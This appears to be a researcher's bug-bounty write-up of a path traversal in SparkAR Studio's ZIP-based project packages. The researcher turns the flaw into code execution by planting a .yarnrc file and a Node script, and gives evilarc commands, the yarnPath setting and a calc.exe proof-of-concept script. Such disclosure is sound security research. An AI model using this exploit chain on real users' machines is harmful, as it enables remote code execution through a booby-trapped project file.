Hi everyone. As promised, this is the write-up for the Spark AR RCE I discovered a while ago.

It started when I stumbled upon an article from the Facebook bug bounty program that mentioned an increased payout for binary reports:

A vulnerability that results in remote code execution when running a Spark AR effect, either through a bug that exploits the Hermes JavaScript VM or the Spark AR platform directly. Providing a full proof of concept that demonstrates the remote code execution would result in an average payout of $40,000 (including the proof of concept bonus).

This seemed interesting. Back then I thought the increased payout (the $40K) applied to client-side vulnerabilities as well. I was wrong: Facebook later explained that this payout was for issues that execute directly on their infrastructure. That's okay, because exploiting this issue was fun.

Enough with the stories, let's dive into the vulnerability itself. The main issue was a path traversal in SparkAR Studio when parsing arprojpkg files.

Initial Analysis

I always start by performing attack surface analysis: I try to find which file formats and protocols are associated with the application, which ports it listens on, what hosts it connects to, what RPC interfaces are available, etc.



So I installed SparkAR Studio on a VM and started looking at which file types are associated with it, and I found the following files.

The arprojpkg seemed interesting because of the pkg in the name: package files tend to bundle other files inside them, which can lead to security bugs, and most programs use the ZIP format to bundle these files, which is known to cause many issues. If you want to know more about this, you can watch this amazing livestream by Gynvael Coldwind.

Anyway, I fired up SparkAR, created a project, and packaged it as an arprojpkg file for analysis. The first thing I wanted to confirm was my assumption that this is a ZIP-based file. You can easily confirm this with a hex editor, since a ZIP file usually (though not always) starts with the characters PK. Another option is the file command on Linux, which detects the file type. I did that and confirmed that arprojpkg is nothing but a ZIP file (the other file types, arexport and arproj, are also ZIP files, BTW).
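The same signature check can be scripted. Here is a minimal sketch in Python, using a tiny in-memory archive as a stand-in for a real arprojpkg file; the helper name looks_like_zip and the sample entry name are my own placeholders, not anything from SparkAR.

```python
import io
import zipfile

ZIP_LOCAL_HEADER_MAGIC = b"PK\x03\x04"  # signature of a ZIP local file header


def looks_like_zip(data: bytes) -> bool:
    """Return True if the bytes start with the ZIP local file header signature."""
    return data[:4] == ZIP_LOCAL_HEADER_MAGIC


# Build a tiny archive in memory as a stand-in for a packaged project
# (assumption: a real .arprojpkg would be read from disk instead).
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("Sample.arproj", "placeholder project data")

sample_bytes = buffer.getvalue()
print(looks_like_zip(sample_bytes))                  # quick magic-byte check
print(zipfile.is_zipfile(io.BytesIO(sample_bytes)))  # stricter stdlib check
```

The magic-byte check is only a hint (an empty or self-extracting archive starts differently), which is why the sketch also calls zipfile.is_zipfile.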

Behavior Analysis



The next step was to look at the file contents to see whether SparkAR extracts those files to the file system (some developers don't write the files to disk and instead read them into memory directly). These are the contents of the file when opened using a regular ZIP application.





As you can see, we have some folders containing the project assets and a bundled arproj file. To find where (and if) these files are extracted, I used the procmon tool from Microsoft. It is part of the Sysinternals Suite, which has many tools for performing behavioral analysis of a binary.

Since I could see that there's a file named PassTheObject.arproj inside the zip, I added a rule to procmon to filter file operations related to that file. If the file is written to disk, it should show up in the procmon logs. This is the rule I added.
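If you prefer a script over a ZIP application, the archive contents can also be listed with Python's zipfile module. This is a rough sketch on an in-memory stand-in archive: the texture entry is a made-up placeholder, and only the PassTheObject.arproj name comes from my actual project.

```python
import io
import zipfile

# Stand-in archive; a real .arprojpkg would be opened from disk instead.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("PassTheObject.arproj", b"placeholder")
    archive.writestr("textures/placeholder.png", b"placeholder")  # hypothetical asset

with zipfile.ZipFile(io.BytesIO(buffer.getvalue())) as archive:
    # Collect (name, uncompressed size) for every entry in the archive.
    listing = [(info.filename, info.file_size) for info in archive.infolist()]

# Pick out bundled project files, which make good names to filter on later.
bundled_projects = [name for name, _ in listing if name.endswith(".arproj")]

for name, size in listing:
    print(f"{size:>8}  {name}")
print(bundled_projects)
```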

After that, I opened the file using SparkAR and in the results, I saw that the file was written to a cache folder, in the user's AppData directory.

So it's confirmed that the files are indeed written to disk. Time to move to the next step.

Testing for Path Traversal

Now that it's confirmed that the ZIP is extracted to disk, I added a file to see whether arbitrary files can be added to the ZIP file. Next, I tested whether I could use path traversal to write to an arbitrary location. To do so I used a tool named evilarc, which lets you create a zip file that contains files with directory traversal characters in their embedded path.

I used the following command to add test.txt with a depth of 8 folders to my spark project file

evilarc.py -d 8 -f 1.zip test.txt

After that, I ran SparkAR and opened the file, and indeed "test.txt" was written to the user's home folder.
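To make the idea behind such an archive concrete, here is a rough sketch of how an entry with an embedded traversal path can be stored using Python's zipfile module. It is not evilarc's actual implementation: the helper add_traversal_entry, the "../" separator, and the sample entries are my own assumptions for illustration.

```python
import io
import zipfile

DEPTH = 8  # number of parent-directory components, mirroring the -d 8 option


def add_traversal_entry(archive: zipfile.ZipFile, name: str, data: bytes, depth: int) -> str:
    """Store data under a name prefixed with `depth` parent-directory components."""
    entry_name = "../" * depth + name
    archive.writestr(entry_name, data)  # the name is stored as given
    return entry_name


buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("Sample.arproj", b"placeholder project data")  # benign entry
    stored_name = add_traversal_entry(archive, "test.txt", b"hello", DEPTH)

# Re-open the archive and read back the entry names exactly as stored.
with zipfile.ZipFile(io.BytesIO(buffer.getvalue())) as archive:
    entry_names = archive.namelist()

print(entry_names)
```

The ZIP format itself does not forbid such names; it is up to the extracting application to reject them. Python's own ZipFile.extract and extractall strip ".." components, which is why this sketch only lists the names instead of extracting them.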

This confirms the path traversal vulnerability. Now we have an arbitrary file write that we need to turn into an RCE.
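Why does this work? If an extractor simply joins the entry name onto its extraction directory, the ".." components walk back out of that directory. The sketch below shows this with Python's ntpath module (Windows path rules, usable on any OS). The extraction root, the username "victim", and the helper names are hypothetical; I am not claiming this is the exact cache path or code used by SparkAR.

```python
import ntpath  # Windows path semantics, importable on any platform

# Hypothetical cache location, NOT the real directory used by SparkAR.
EXTRACT_ROOT = r"C:\Users\victim\AppData\Local\Temp\cache\project"


def naive_target(root: str, entry_name: str) -> str:
    """Join an entry name onto the extraction root without any validation."""
    return ntpath.normpath(ntpath.join(root, entry_name.replace("/", "\\")))


def escapes_root(root: str, entry_name: str) -> bool:
    """Return True if the resolved target falls outside the extraction root."""
    root = ntpath.normpath(root)
    target = naive_target(root, entry_name)
    return ntpath.commonpath([root, target]) != root


benign = "assets/texture.png"
malicious = "../" * 5 + "test.txt"  # five levels up from the hypothetical root

print(naive_target(EXTRACT_ROOT, benign))
print(naive_target(EXTRACT_ROOT, malicious))
print(escapes_root(EXTRACT_ROOT, benign), escapes_root(EXTRACT_ROOT, malicious))
```

A check along the lines of escapes_root, run before each file is written, is one way an extractor could refuse such entries.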

Exploitation

My first thought to achieve RCE was to find a DLL hijacking issue and add the DLL to the .arprojpkg file. It seemed like it would be a quick win, but when I started analyzing the project I faced two issues. The first one is related to permissions: you can't write to a privileged path (I was unable to write to C:\, for example). The other problem is that the missing DLLs were either in the "Program Files" directory, which is a privileged path, or they were loaded from the same location as the project file. The latter is not reliable, since you don't know the exact location where the user downloaded the project, and it will probably not fire the exploit the first time because the DLL is extracted after SparkAR has already started.

Another solution would be to write to the startup directory of the start menu. This is okay, but it requires a restart or a log out and log in to fire the RCE, and I wanted something more reliable.



So I ended up doing more analysis, and here's what I found: SparkAR starts a nodejs (node.exe) process after opening the project, which seemed interesting.

I wanted to see if the nodejs process was executing a js file that we could write (or overwrite) using the path traversal, so I started looking at the files touched by nodejs using procmon. This is similar in concept to DLL hijacking.

I found that the js files executed by nodejs were also loaded from a privileged location, which means we can't use the path traversal to write any of these files. After that, I dug deeper and looked for other files that the nodejs process was trying to load, and I found that nodejs was trying to load a .yarnrc file (which didn't exist) from different locations, including the user's home folder.

The home folder of the user is not privileged so it can be written using our path traversal without any problems.

I started reading the documentation for the .yarnrc file to see if we could somehow use it to achieve RCE, and one of the settings got my attention: the yarn-path property can point to the yarn path, meaning we can execute js files from an arbitrary location. One thing to note, though, is that the path is relative. In this case it was relative to C:\. I'm not sure why, but it seems related to the command line used to start the nodejs process.

So to exploit the issue, I wanted to perform the following steps.

- Extract a js file to a known path that is relative to C:\.

- Write a .yarnrc file with yarn-path pointing to that js file.

I ended up choosing /Users/Public to extract my js file, since it's a location that exists by default and doesn't require admin privileges. I could have used the user's home folder as well, but that would require knowledge of the username, which adds a limitation. So I created the following yarnrc file.

yarnPath: /Users/Public/test.js

Then I created test.js with the following content.

const { exec } = require('child_process');

// Launch calc.exe as a harmless proof of execution and log the result.
exec('calc.exe', (error, stdout, stderr) => {
  console.log('error', error);
  console.log('stdout ', stdout);
  console.log('stderr ', stderr);
});

Then I bundled them into the .arprojpkg using evilarc with the following commands.

evilarc.py -d 10 --path=Users\\Public -f 1.zip test.js

evilarc.py -d 8 -f 1.zip .yarnrc

I renamed 1.zip to 1.arprojpkg and opened it with SparkAR. Once the file is opened, test.js is extracted to C:\Users\Public and .yarnrc is extracted to the user's home folder. After that, the nodejs process starts and loads our .yarnrc, which executes test.js, and now we have achieved RCE.
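A side note on the depth of 10 used for test.js: on Windows, ".." components that go past the drive root are simply dropped, so overshooting the depth still lands on C:\ regardless of how deep the extraction folder is. The sketch below illustrates this with Python's ntpath module. The two candidate roots, the usernames, and the resolve helper are hypothetical examples, not paths taken from SparkAR.

```python
import ntpath  # Windows path semantics, importable on any platform

# Hypothetical extraction directories of different depths on the same drive.
CANDIDATE_ROOTS = [
    r"C:\Users\alice\AppData\Local\Temp\cache",
    r"C:\Users\bob\AppData\Local\SomeVendor\cache\projects\tmp",
]

# Mirrors "-d 10 --path=Users\\Public" followed by the file name.
ENTRY = "..\\" * 10 + r"Users\Public\test.js"


def resolve(root: str, entry_name: str) -> str:
    """Resolve an entry name against a root the way a naive extractor would."""
    return ntpath.normpath(ntpath.join(root, entry_name))


resolved = [resolve(root, ENTRY) for root in CANDIDATE_ROOTS]
print(resolved)
```

Both roots resolve to the same file under C:\Users\Public, which is why a fixed, generous depth is enough when the target path is anchored at the drive root. The .yarnrc entry is different: it has to land exactly in the home folder, so its depth has to match the real cache location.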

I sent the report to the Facebook bug bounty program and they rewarded me $2500 for this finding. I disputed the bounty amount based on the article I mentioned at the beginning of this blog post, but they explained to me that the payout was for issues that execute directly on their infrastructure.

Thanks for reading this blog post, I hope you enjoyed it.
